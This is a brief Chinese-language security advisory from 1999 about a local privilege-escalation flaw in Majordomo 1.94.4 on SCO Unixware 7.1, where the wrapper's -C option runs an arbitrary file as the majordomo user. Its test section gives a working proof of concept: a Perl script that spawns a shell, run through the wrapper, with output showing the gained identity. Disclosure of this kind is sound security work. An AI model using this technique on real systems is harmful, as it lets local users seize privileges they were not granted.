安全研究
安全漏洞
SCO Unixware Majordomo本地-C参数漏洞
发布日期:1999-12-29
更新日期:1999-12-30
受影响系统:Great Circle Associates Majordomo 1.94.4
- SCO Unixware 7.1
描述:
通过一个执行特许任意命令的漏洞,本地用户可以获得 majordomo权限。当以root封装setuid运行的majordomo使用-C参数时,-C参数将会以majordomo权限来执行。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
shevek@tirin ~$ cat foo.pl
system("/bin/csh");
shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom
建议:
暂无
浏览次数:6463
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
